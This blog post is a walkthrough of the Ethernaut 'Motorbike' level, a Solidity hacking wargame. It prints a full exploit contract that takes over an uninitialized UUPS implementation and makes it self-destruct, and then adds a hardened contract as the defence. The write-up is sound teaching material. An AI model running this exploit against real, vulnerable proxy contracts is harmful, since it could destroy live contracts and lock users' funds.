# Smart Contract Hacking Ethernaut: 25. Motorbike

By [Leek DEV](https://paragraph.com/@leekdev) · 2023-09-28

---

[Ethernaut](https://ethernaut.openzeppelin.com/) is a wargame built by [OpenZeppelin](https://www.openzeppelin.com/) around the Solidity programming language; every level is a smart contract that has to be hacked.

Tutorials
--

*   GitHub - [attack code](https://github.com/6boris)

*   Bilibili - [video tutorial](https://space.bilibili.com/3493272831920239)

*   YouTube - [video tutorial](https://www.youtube.com/@LeekDEV)

*   TikTok - ….

Challenge
--

Make the motorbike contract unusable.

Hack approach
------

…

Read the engine contract address from the proxy's implementation storage slot:

    // ERC-1967 implementation slot: keccak256("eip1967.proxy.implementation") - 1
    await web3.eth.getStorageAt(instance, '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc')

Run the attack against the engine's contract address:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;
    
    // Minimal view of the Engine (the UUPS implementation behind the Motorbike proxy).
    interface IEngine {
        function initialize() external;
        function upgradeToAndCall(address newImplementation, bytes memory data) external payable;
    }
    
    // The Engine will delegatecall into this contract after the upgrade; because the
    // code runs in the Engine's own context, selfdestruct removes the Engine itself.
    contract _motorbikeHackTool {
        function initialize() external {
            selfdestruct(payable(msg.sender));
        }
    }
    
    contract MotorbikeHack {
        IEngine public exploitInst;
    
        // _target is the Engine address read from the proxy's implementation slot.
        constructor(address _target) {
            exploitInst = IEngine(_target);
            // The implementation was never initialized in its own storage, so this
            // call succeeds and makes this contract the Engine's upgrader.
            exploitInst.initialize();
            // Upgrade to the tool and immediately delegatecall its initialize(),
            // which executes selfdestruct in the Engine's context.
            exploitInst.upgradeToAndCall(address(new _motorbikeHackTool()), abi.encodeWithSignature("initialize()"));
        }
    }
    

Hack example
------

…

Defense approach
----

…
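The defensive counterpart, added here as an illustration (it is neither the level's own Engine nor OpenZeppelin's code): a UUPS implementation whose constructor calls `_disableInitializers()`, so the bare implementation can never be initialized and nobody can become its `upgrader`, and whose upgrade entry point inherits OpenZeppelin's `onlyProxy` guard. The contract name `HardenedEngine`, the `upgrader`/`horsePower` fields and the import paths are assumptions for this example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration, not the Ethernaut level's Engine. Assumes OpenZeppelin's
// upgradeable contracts are installed under the import paths below.
import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol";
import "@openzeppelin/contracts-upgradeable/proxy/utils/UUPSUpgradeable.sol";

contract HardenedEngine is Initializable, UUPSUpgradeable {
    address public upgrader;
    uint256 public horsePower;

    /// Locks the implementation contract itself: initialize() can only ever run
    /// through a proxy's storage, never on this address. An attacker therefore
    /// cannot become `upgrader` of the bare implementation and point it at a
    /// self-destructing contract.
    /// @custom:oz-upgrades-unsafe-allow constructor
    constructor() {
        _disableInitializers();
    }

    /// Runs once per proxy, in the proxy's storage.
    function initialize() external initializer {
        horsePower = 1000;
        upgrader = msg.sender;
    }

    /// Called by the inherited upgradeToAndCall(), which is itself `onlyProxy`
    /// and so refuses direct calls to the implementation address.
    function _authorizeUpgrade(address) internal view override {
        require(msg.sender == upgrader, "Can't upgrade");
    }
}
```

With this in place, `initialize()` on the implementation address reverts, so the `MotorbikeHack` sequence above fails at its first call. Separately, since EIP-6780 (Cancun upgrade), `selfdestruct` only removes code in the transaction that created the contract, so on post-Cancun chains the final step would no longer delete the Engine either.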

References
----

*   [ERC-1967: Proxy Storage Slots](https://eips.ethereum.org/EIPS/eip-1967)
    
*   [UUPS Proxies: Tutorial (Solidity + JavaScript)](https://forum.openzeppelin.com/t/uups-proxies-tutorial-solidity-javascript/7786)
    
*   [packages/core/contracts/Initializable.sol](https://github.com/OpenZeppelin/openzeppelin-upgrades/blob/master/packages/core/contracts/Initializable.sol)

---

*Originally published on [Leek DEV](https://paragraph.com/@leekdev/ethernaut-25-motorbike)*
